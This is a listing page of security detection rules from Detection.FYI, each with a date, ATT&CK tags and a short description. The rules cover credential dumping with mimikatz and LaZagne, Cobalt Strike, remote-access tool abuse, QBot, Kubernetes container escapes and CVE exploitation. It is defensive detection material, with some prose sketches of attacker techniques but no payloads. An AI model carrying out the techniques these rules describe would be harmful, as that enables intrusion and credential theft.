Detection.FYI

Operator Bloopers Cobalt Strike Commands

Mar 18, 2025 · attack.execution attack.t1059.003 stp.1u ·
Share on:

Detects use of Cobalt Strike commands accidentally entered in the CMD shell

Read More
AnyDesk Network

Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219 ·
Share on:

Detects use of AnyDesk

Read More
Bumblebee WmiPrvSE execution pattern

Mar 18, 2025 · attack.defense-evasion attack.t1036 ·
Share on:

Detects Bumblebee WmiPrvSE parent process manipulation

Read More
Conhost Suspicious Command Execution

Mar 18, 2025 · attack.defense-evasion attack.t1564.003 dist.public ·
Share on:

Detects use of conhost in "headless" mode. By running conhost.exe in "headless" mode, it means that no visible window will pop up on the victim's machine.

Read More
Custom Cobalt Strike Command Execution

Mar 18, 2025 · attack.defense-evasion attack.t1562.001 attack.execution attack.t1059.001 ·
Share on:

Detects the execution of a specific OneLiner to Invoke PowerShell commands.

Read More
Deleting Windows Defender scheduled tasks

Mar 18, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects the deletion of scheduled tasks related to Windows Defender.

Read More
Enable WDigest using PowerShell

Mar 18, 2025 · attack.defense-evasion attack.t1112 ·
Share on:

Rule to detect registry modifications to enable WDigest using powershell over the commandline.

Read More
Enable WDigest using PowerShell (ps_module)

Mar 18, 2025 · attack.defense-evasion attack.t1112 ·
Share on:

Rule to detect registry modifications to enable WDigest using powershell script modules.

Read More
Enabling RDP service via reg.exe command execution

Mar 18, 2025 · attack.defense-evasion attack.lateral-movement attack.t1021.001 attack.t1112 ·
Share on:

Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host

Read More
Enabling restricted admin mode

Mar 18, 2025 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects the registry modification to enable restricted admin mode using reg.exe

Read More
Exchange WebShell Creation

Mar 18, 2025 · attack.t1505.003 attack.persistence attack.t1190 attack.initial-access ·
Share on:

These commands were used to create a WebShell by exploiting ProxyShell vulnerabilities

Read More
Execution of ZeroLogon PoC executable

Mar 18, 2025 · attack.execution attack.lateral-movement attack.t1210 ·
Share on:

Detects the execution of the commonly used ZeroLogon PoC executable.

Read More
FlawedGrace spawning threat injection target

Mar 18, 2025 · attack.defense-evasion attack.t1055 dist.public ·
Share on:

Detecting the command FlawedGrace is using for the purpose of injecting into it the spawned process, in this case the cmd.exe process.

Read More
Hiding local user accounts

Mar 18, 2025 · attack.t1564.002 attack.defense-evasion ·
Share on:

Detects the use reg.exe to hide users from listed in the logon screen. This is possible by changing the registry key value to 0 for a specific user.

Read More
Invoke-ShareFinder Module Load Detection

Mar 18, 2025 · attack.discovery attack.t1135 dist.public ·
Share on:

Use of Invoke-ShareFinder detected via PowerShell logging

Read More
Invoke-ShareFinder Script Block Execution

Mar 18, 2025 · attack.discovery attack.t1135 dist.public ·
Share on:

Use of Invoke-ShareFinder detected via PowerShell Script Block logging

Read More
JavaScript Execution Using MSDOS 8.3 File Notation

Mar 18, 2025 · attack.defense-evasion attack.t1059 dist.public ·
Share on:

Detects script execution using MSDOS 8.3 File names

Read More
Lazagne dumping credentials

Mar 18, 2025 · attack.credential-access attack.t1555 ·
Share on:

Detects the use of lazagne using command line execution.

Read More
Mimikatz Command Line With Ticket Export

Mar 18, 2025 · attack.credential-access attack.t1003 attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006 ·
Share on:

Detection of well-known mimikatz command line arguments. Added more commandline indicators from referenced rule by author - Teymur Kheirkhabarov, oscd.community

Read More
Mshta Executing from Registry

Mar 18, 2025 · attack.defense-evasion attack.t1218.005 ·
Share on:

Detects a Mshta executing code from the registry

Read More
Operator Bring Your Own Tools

Mar 18, 2025 · attack.command-and-control attack.t1105 ·
Share on:

Detects use of custom scripts i.e. BAT files.

Read More
Potential Qbot SMB DLL Lateral Movement

Mar 18, 2025 · attack.lateral-movement attack.t1570 ·
Share on:

Detection of potential us of SMB to transfer DLL's into the C$ folder of hosts unique to Qbot malware for purposes of lateral movement.

Read More
Potential SMB DLL Lateral Movement

Mar 18, 2025 · attack.lateral-movement attack.t1570 ·
Share on:

Detection of potential us of SMB to transfer DLL's into the ProgramData folder of hosts for purposes of lateral movement.

Read More
QBot process creation from scheduled task REGSVR32 (regsvr32.exe), -s flag and SYSTEM in the command line

Mar 18, 2025 · attack.persistence attack.privilege-escalation attack.t1053.005 ·
Share on:

Detects the process creation from Scheduled Task with REGSVR32 (regsvr32.exe), -s flag and SYSTEM in the command line

Read More
QBot scheduled task REGSVR32 with C$ image path

Mar 18, 2025 · attack.persistence attack.privilege-escalation attack.t1053.005 ·
Share on:

Detects the creation of Scheduled Task with REGSVR32 (regsvr32.exe) and C$ in the image path field

Read More
Renamed Autohotkey Binary

Mar 18, 2025 · attack.defense-evasion attack.t1036.003 ·
Share on:

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

Read More
SplashTop Network

Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219 ·
Share on:

Detects use of SplashTop

Read More
SplashTop Process

Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219 ·
Share on:

Detects use of SplashTop

Read More
SSH over port 443 with known Server and Client Strings

Mar 18, 2025 · attack.command-and-control attack.t1572 ·
Share on:

Will detect the presence of known SSH client and SSH server strings that have been used for SSH tunneling.

Read More
Suspicious Commands by SQL Server

Mar 18, 2025 · attack.initial-access attack.persistence attack.privilege-escalation ·
Share on:

Detects suspicious commands created from sqlservr process.

Read More
Viewing remote directories

Mar 18, 2025 · attack.discovery attack.t1083 dist.public ·
Share on:

Detecting the use of dir command to inspect directories on the remote host.

Read More
Potential APT FIN7 Exploitation Activity

Mar 16, 2025 · attack.execution attack.t1059.001 attack.t1059.003 detection.emerging-threats ·
Share on:

Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.

Read More
Service Reload or Start - Linux

Mar 4, 2025 · attack.persistence attack.t1543.002 ·
Share on:

Detects the start, reload or restart of a service.

Read More
Notepad Password Files Discovery

Mar 4, 2025 · attack.discovery attack.t1083 ·
Share on:

Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.

Read More
ADS Zone.Identifier Deleted By Uncommon Application

Mar 4, 2025 · attack.defense-evasion attack.t1070.004 ·
Share on:

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.

Read More
Cisco Duo Successful MFA Authentication Via Bypass Code

Mar 4, 2025 · attack.credential-access attack.defense-evasion attack.initial-access ·
Share on:

Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.

Read More
Forest Blizzard APT - Custom Protocol Handler Creation

Mar 4, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats ·
Share on:

Detects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT.

Read More
Forest Blizzard APT - Custom Protocol Handler DLL Registry Set

Mar 4, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats ·
Share on:

Detects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT.

Read More
Forest Blizzard APT - JavaScript Constrained File Creation

Mar 4, 2025 · attack.defense-evasion attack.t1562.002 detection.emerging-threats ·
Share on:

Detects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.

Read More
Kubernetes Unauthorized or Unauthenticated Access

Mar 4, 2025 · attack.privilege-escalation ·
Share on:

Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained.

Read More
Outbound Network Connection Initiated By Microsoft Dialer

Mar 4, 2025 · attack.execution attack.t1071.001 ·
Share on:

Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"

Read More
Pnscan Binary Data Transmission Activity

Mar 4, 2025 · attack.discovery attack.t1046 ·
Share on:

Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT

Read More
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection

Mar 4, 2025 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion cve.2024-3400 detection.emerging-threats ·
Share on:

Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.

Read More
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation

Mar 4, 2025 · attack.execution cve.2024-3400 detection.emerging-threats ·
Share on:

Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.

Read More
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE

Mar 4, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001 attack.t1574.002 ·
Share on:

Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".

Read More
PUA - SoftPerfect Netscan Execution

Mar 4, 2025 · attack.discovery attack.t1046 ·
Share on:

Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.

Read More
RegAsm.EXE Initiating Network Connection To Public IP

Mar 4, 2025 · attack.defense-evasion attack.t1218.009 ·
Share on:

Detects "RegAsm.exe" initiating a network connection to public IP adresses

Read More
Malicious PowerShell Commandlets - PoshModule

Mar 4, 2025 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001 ·
Share on:

Detects Commandlet names from well-known PowerShell exploitation frameworks

Read More
Malicious PowerShell Commandlets - ProcessCreation

Mar 4, 2025 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001 ·
Share on:

Detects Commandlet names from well-known PowerShell exploitation frameworks

Read More
Malicious PowerShell Scripts - FileCreation

Mar 4, 2025 · attack.execution attack.t1059.001 ·
Share on:

Detects the creation of known offensive powershell scripts used for exploitation

Read More
Malicious PowerShell Scripts - PoshModule

Mar 4, 2025 · attack.execution attack.t1059.001 ·
Share on:

Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance

Read More
Anydesk Remote Access Software Service Installation

Mar 4, 2025 · attack.persistence ·
Share on:

Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.

Read More
Remote Access Tool - AnyDesk Execution

Mar 4, 2025 · attack.command-and-control attack.t1219 ·
Share on:

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Read More
Remote Access Tool - Anydesk Execution From Suspicious Folder

Mar 4, 2025 · attack.command-and-control attack.t1219 ·
Share on:

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Read More
Remote Access Tool - AnyDesk Incoming Connection

Mar 4, 2025 · attack.persistence attack.command-and-control attack.t1219 ·
Share on:

Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.

Read More
Suspicious Binary Writes Via AnyDesk

Mar 4, 2025 · attack.command-and-control attack.t1219 ·
Share on:

Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)

Read More
Nslookup PowerShell Download Cradle

Mar 4, 2025 · attack.execution attack.t1059.001 ·
Share on:

Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.

Read More
HTTP Request to Low Reputation TLD or Suspicious File Extension

Mar 4, 2025 · attack.initial-access attack.command-and-control ·
Share on:

Detects HTTP requests to low reputation TLDs (e.g. .xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity.

Read More
Backup Files Deleted

Feb 28, 2025 · attack.impact attack.t1490 ·
Share on:

Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

Read More
File Deleted Via Sysinternals SDelete

Feb 28, 2025 · attack.defense-evasion attack.t1070.004 ·
Share on:

Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

Read More
Potential Obfuscated Ordinal Call Via Rundll32

Feb 25, 2025 · attack.defense-evasion attack.t1027.010 ·
Share on:

Detects execution of "rundll32" with potential obfuscated ordinal calls

Read More
Process Memory Dump Via Comsvcs.DLL

Feb 25, 2025 · attack.defense-evasion attack.credential-access attack.t1036 attack.t1003.001 car.2013-05-009 ·
Share on:

Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)

Read More
Potential CVE-2024-35250 Exploitation Activity

Feb 24, 2025 · attack.privilege-escalation attack.t1068 cve.2024-35250 detection.emerging-threats ·
Share on:

Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.

Read More
Clfs.SYS Loaded By Process Located In a Potential Suspicious Location

Feb 22, 2025 · attack.execution attack.t1059 ·
Share on:

Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.

Read More
Python Initiated Connection

Feb 22, 2025 · attack.discovery attack.t1046 ·
Share on:

Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.

Read More
Python Inline Command Execution

Feb 22, 2025 · attack.execution attack.t1059 ·
Share on:

Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.

Read More
Suspicious Non-Browser Network Communication With Google API

Feb 22, 2025 · attack.command-and-control attack.t1102 ·
Share on:

Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)

Read More
Windows Event Log Access Tampering Via Registry

Feb 17, 2025 · attack.t1547.001 attack.t1112 ·
Share on:

Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".

Read More
Potentially Suspicious WDAC Policy File Creation

Feb 17, 2025 · attack.defense-evasion ·
Share on:

Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.

Read More
Kalambur Backdoor Curl TOR SOCKS Proxy Execution

Feb 17, 2025 · attack.command-and-control attack.t1090 attack.t1573 attack.t1071.001 attack.t1059.001 attack.s0183 detection.emerging-threats ·
Share on:

Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity.

Read More
AADInternals PowerShell Cmdlets Execution - ProccessCreation

Feb 17, 2025 · attack.execution attack.reconnaissance attack.discovery attack.credential-access attack.impact ·
Share on:

Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.

Read More
AADInternals PowerShell Cmdlets Execution - PsScript

Feb 17, 2025 · attack.execution attack.reconnaissance attack.discovery attack.credential-access attack.impact ·
Share on:

Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.

Read More
PUA - NimScan Execution

Feb 17, 2025 · attack.discovery attack.t1046 ·
Share on:

Detects usage of NimScan, a portscanner utility. In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment. This rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.

Read More
Schtasks Creation Or Modification With SYSTEM Privileges

Feb 17, 2025 · attack.execution attack.persistence attack.t1053.005 ·
Share on:

Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges

Read More
Add Port Monitor Persistence in Registry

Feb 3, 2025 · attack.persistence attack.t1547.010 ·
Share on:

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.

Read More
Change Winevt Channel Access Permission Via Registry

Feb 3, 2025 · attack.defense-evasion attack.t1562.002 ·
Share on:

Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.

Read More
Container With A hostPath Mount Created

Feb 3, 2025 · attack.t1611 ·
Share on:

Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.

Read More
Creation Of Pod In System Namespace

Feb 3, 2025 · attack.t1036.005 ·
Share on:

Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.

Read More
CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection

Feb 3, 2025 · attack.initial-access cve.2024-1212 detection.emerging-threats ·
Share on:

Detects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character.

Read More
Deployment Deleted From Kubernetes Cluster

Feb 3, 2025 · attack.t1498 ·
Share on:

Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations.

Read More
Disable Windows Event Logging Via Registry

Feb 3, 2025 · attack.defense-evasion attack.t1562.002 ·
Share on:

Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel

Read More
Displaying Hidden Files Feature Disabled

Feb 3, 2025 · attack.defense-evasion attack.t1564.001 ·
Share on:

Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.

Read More
EVTX Created In Uncommon Location

Feb 3, 2025 · attack.defense-evasion attack.t1562.002 ·
Share on:

Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. Note that backup software and legitimate administrator might perform similar actions during troubleshooting.

Read More
Kernel Memory Dump Via LiveKD

Feb 3, 2025 · attack.defense-evasion ·
Share on:

Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory

Read More
Kubernetes Events Deleted

Feb 3, 2025 · attack.t1070 ·
Share on:

Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection.

Read More
Kubernetes Secrets Enumeration

Feb 3, 2025 · attack.t1552.007 ·
Share on:

Detects enumeration of Kubernetes secrets.

Read More
Loaded Module Enumeration Via Tasklist.EXE

Feb 3, 2025 · attack.t1003 ·
Share on:

Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. In order to dump the process memory or perform other nefarious actions.

Read More
MaxMpxCt Registry Value Changed

Feb 3, 2025 · attack.defense-evasion attack.t1070.005 ·
Share on:

Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.

Read More
New Kubernetes Service Account Created

Feb 3, 2025 · attack.t1136 ·
Share on:

Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.

Read More
New TimeProviders Registered With Uncommon DLL Name

Feb 3, 2025 · attack.persistence attack.privilege-escalation attack.t1547.003 ·
Share on:

Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.

Read More
OpenCanary - FTP Login Attempt

Feb 3, 2025 · attack.initial-access attack.exfiltration attack.t1190 attack.t1021 ·
Share on:

Detects instances where an FTP service on an OpenCanary node has had a login attempt.

Read More
OpenCanary - GIT Clone Request

Feb 3, 2025 · attack.collection attack.t1213 ·
Share on:

Detects instances where a GIT service on an OpenCanary node has had Git Clone request.

Read More
OpenCanary - HTTP GET Request

Feb 3, 2025 · attack.initial-access attack.t1190 ·
Share on:

Detects instances where an HTTP service on an OpenCanary node has received a GET request.

Read More
OpenCanary - HTTP POST Login Attempt

Feb 3, 2025 · attack.initial-access attack.t1190 ·
Share on:

Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.

Read More
OpenCanary - HTTPPROXY Login Attempt

Feb 3, 2025 · attack.initial-access attack.defense-evasion attack.t1090 ·
Share on:

Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.

Read More
OpenCanary - MSSQL Login Attempt Via SQLAuth

Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213 ·
Share on:

Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.

Read More
OpenCanary - MSSQL Login Attempt Via Windows Authentication

Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213 ·
Share on:

Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.

Read More
OpenCanary - MySQL Login Attempt

Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213 ·
Share on:

Detects instances where a MySQL service on an OpenCanary node has had a login attempt.

Read More
OpenCanary - NTP Monlist Request

Feb 3, 2025 · attack.impact attack.t1498 ·
Share on:

Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.

Read More
OpenCanary - REDIS Action Command Attempt

Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213 ·
Share on:

Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.

Read More
OpenCanary - SIP Request

Feb 3, 2025 · attack.collection attack.t1123 ·
Share on:

Detects instances where an SIP service on an OpenCanary node has had a SIP request.

Read More
OpenCanary - SMB File Open Request

Feb 3, 2025 · attack.lateral-movement attack.collection attack.t1021 attack.t1005 ·
Share on:

Detects instances where an SMB service on an OpenCanary node has had a file open request.

Read More
OpenCanary - SNMP OID Request

Feb 3, 2025 · attack.discovery attack.lateral-movement attack.t1016 attack.t1021 ·
Share on:

Detects instances where an SNMP service on an OpenCanary node has had an OID request.

Read More
OpenCanary - SSH Login Attempt

Feb 3, 2025 · attack.initial-access attack.lateral-movement attack.persistence attack.t1133 attack.t1021 attack.t1078 ·
Share on:

Detects instances where an SSH service on an OpenCanary node has had a login attempt.

Read More
OpenCanary - SSH New Connection Attempt

Feb 3, 2025 · attack.initial-access attack.lateral-movement attack.persistence attack.t1133 attack.t1021 attack.t1078 ·
Share on:

Detects instances where an SSH service on an OpenCanary node has had a connection attempt.

Read More
OpenCanary - Telnet Login Attempt

Feb 3, 2025 · attack.initial-access attack.command-and-control attack.t1133 attack.t1078 ·
Share on:

Detects instances where a Telnet service on an OpenCanary node has had a login attempt.

Read More
OpenCanary - TFTP Request

Feb 3, 2025 · attack.exfiltration attack.t1041 ·
Share on:

Detects instances where a TFTP service on an OpenCanary node has had a request.

Read More
OpenCanary - VNC Connection Attempt

Feb 3, 2025 · attack.lateral-movement attack.t1021 ·
Share on:

Detects instances where a VNC service on an OpenCanary node has had a connection attempt.

Read More
Potential KamiKakaBot Activity - Lure Document Execution

Feb 3, 2025 · attack.execution attack.t1059 detection.emerging-threats ·
Share on:

Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.

Read More
Potential KamiKakaBot Activity - Shutdown Schedule Task Creation

Feb 3, 2025 · attack.persistence detection.emerging-threats ·
Share on:

Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.

Read More
Potential KamiKakaBot Activity - Winlogon Shell Persistence

Feb 3, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats ·
Share on:

Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.

Read More
Potential Remote Command Execution In Pod Container

Feb 3, 2025 · attack.t1609 ·
Share on:

Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.

Read More
Potential Sidecar Injection Into Running Deployment

Feb 3, 2025 · attack.t1609 ·
Share on:

Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.

Read More
Potentially Suspicious CMD Shell Output Redirect

Feb 3, 2025 · attack.defense-evasion attack.t1218 ·
Share on:

Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.

Read More
Privileged Container Deployed

Feb 3, 2025 · attack.t1611 ·
Share on:

Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attacks. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields

Read More
RBAC Permission Enumeration Attempt

Feb 3, 2025 · attack.t1069.003 attack.t1087.004 ·
Share on:

Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.

Read More
Register New IFiltre For Persistence

Feb 3, 2025 · attack.persistence ·
Share on:

Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.

Read More
Registry Persistence via Service in Safe Mode

Feb 3, 2025 · attack.defense-evasion attack.t1564.001 ·
Share on:

Detects the modification of the registry to allow a driver or service to persist in Safe Mode.

Read More
Remote Access Tool - Team Viewer Session Started On Linux Host

Feb 3, 2025 · attack.initial-access attack.t1133 ·
Share on:

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Read More
Remote Access Tool - Team Viewer Session Started On MacOS Host

Feb 3, 2025 · attack.initial-access attack.t1133 ·
Share on:

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Read More
Remote Access Tool - Team Viewer Session Started On Windows Host

Feb 3, 2025 · attack.initial-access attack.t1133 ·
Share on:

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Read More
Renamed NirCmd.EXE Execution

Feb 3, 2025 · attack.execution attack.t1059 attack.defense-evasion attack.t1202 ·
Share on:

Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.

Read More
Rundll32 Execution With Uncommon DLL Extension

Feb 3, 2025 · attack.defense-evasion attack.t1218.011 ·
Share on:

Detects the execution of rundll32 with a command line that doesn't contain a common extension

Read More
ServiceDll Hijack

Feb 3, 2025 · attack.persistence attack.privilege-escalation attack.t1543.003 ·
Share on:

Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.

Read More
Suspicious Command Patterns In Scheduled Task Creation

Feb 3, 2025 · attack.execution attack.t1053.005 ·
Share on:

